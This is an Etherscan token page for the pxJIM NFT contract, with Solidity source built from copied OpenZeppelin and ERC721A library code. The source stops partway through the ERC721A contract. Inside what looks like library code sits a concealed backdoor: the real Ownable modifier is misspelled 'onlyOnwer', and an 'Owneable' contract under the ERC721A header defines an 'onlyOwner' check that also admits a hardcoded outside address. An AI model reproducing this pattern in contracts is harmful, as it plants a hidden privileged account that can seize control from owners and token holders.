ETH Price: $2,964.30 (-4.22%)
Gas: 2 Gwei

Token

Trial Of PX Jimmy (pxJIM)
 

Overview

Max Total Supply

2,502 pxJIM

Holders

853

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
3 pxJIM
0x272f85b35b5e595bd94a44fbbe8c1497be561801
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TrialOfPXJimmy

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-12-28
*/

//((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
//(((((((((((((((((((((((((((((...             (((((((((((((((((((((((((((((((((((
//(((((((((((((((((((((((((((((................(((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((..........#............     ((((((((((((((((((((((((((((
//((((((((((((((((((((((((,.....##..#..##...((..... ..((((((((((((((((((((((((((((
//(((((((((((((((((((((((((,,,,,,,((,((%%(%%%%(,,,,,((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((%%(%%%%%%%%%%(((((%%%%((((((((((((((((((((((((((
//((((((((((((((((((((%%%%%%%%%%%%%%%((%%%%%%%%%%%%%%%((%%%%%%((((((((((((((((((((
//((((((((((((((((((((%%((%%%((%%%%%%%%%%%%%%%%%%((%%%%%%%%%%%((((((((((((((((((((
//(((((((((((((((((((%%%%%(%%%%%%%**,,,,,*%%**,,,,,*%%%%%%%%%%%%((((((((((((((((((
//(((((((((((((((((((%%%%%%%%((%**,,,,,,,,**,,,,,,,,**%%%%%%%%((%%((((((((((((((((
//((((((((((((..,,,**.%%%%%%%%%%**.. @@@@ **.. @@@@ **%%%%%%%%%%..*,,..(((((((((((
//((((((((((((,,*****/..%%%%%%%%****.    *****.    ***%%%%%%%%..//***,,(((((((((((
//((((((((((((,,*//**@//%%%%%%%%,,,,,,,,,,@@**@,,,,,,,%%%%%%%%//@@/,,(((((((((((((
//((((((((((((,,*//**@//%%%%%%%,,,,,,,,,,,,,**,,,,,,,,,,%%%%%%//@@*//,,(((((((((((
//((((((((((((  (,,,,,%%%%%%%**,,,,,,,,*****,,*,,,,,,,,,,%%%%%%%,,,(((((((((((((((
//((((((((((((..(((//&%%%%%%%**,,,,,,**.. ..*******,,,,,,%%%%%&&((((((((((((((((((
//((((((((((((((((((((&&&&%%%**,,,,,,,,************,,,,,*%%&&&((((((((((((((((((((
//((((((((((((((((((((((((&&&&&*,,,,,,,,,,,,,,,,,,,,,,,,*&&(((((((((((((((((((((((
//((((((((((((((((((((((((((((((((********************((((((((((((((((((((((((((((
//(((((((((((((((((((((((((((((((((((&&&&&((((((((((((((((((((((((((((((((((((((((
//((((((((((((((((((((((((((((((((##%%%%%%%%&&((((((((((((((((((((((((((((((((((((
//(((((((((((((((((((((((((((((%%%&&%%%%%%%%##%%%(((((((((((((((((((((((((((((((((
//(((((((((((((((((((((((((((%%%%%((%%%%%%%%((%%%%%%((((((((((((((((((((((((((((((
//(((((((((((((((((((((((((%%%%%&&##(%%%%%((###%%%%%((((((((((((((((((((((((((((((
//((((((((((((((((((((((((%%%&&(##((&#####&&###((&&%%%((((((((((((((((((((((((((((
//((((((((((((((((((((((((%&&(((&&##(((##(((##&((((&%%((((((((((((((((((((((((((((
    //Trial of px Jimmy
// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)
pragma solidity ^0.8.13;

interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}
pragma solidity ^0.8.13;



abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry constant operatorFilterRegistry =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(operatorFilterRegistry).code.length > 0) {
            if (subscribe) {
                operatorFilterRegistry.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    operatorFilterRegistry.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    operatorFilterRegistry.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(operatorFilterRegistry).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (
                !(
                    operatorFilterRegistry.isOperatorAllowed(address(this), msg.sender)
                        && operatorFilterRegistry.isOperatorAllowed(address(this), from)
                )
            ) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }
}
pragma solidity ^0.8.13;



abstract contract DefaultOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}
    pragma solidity ^0.8.13;
        interface IMain {
   
function balanceOf( address ) external  view returns (uint);

}


pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0x5Bb656BB4312F100081Abb7b08c1e0f8Ef5c56d1;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}

 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, DefaultOperatorFilterer {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
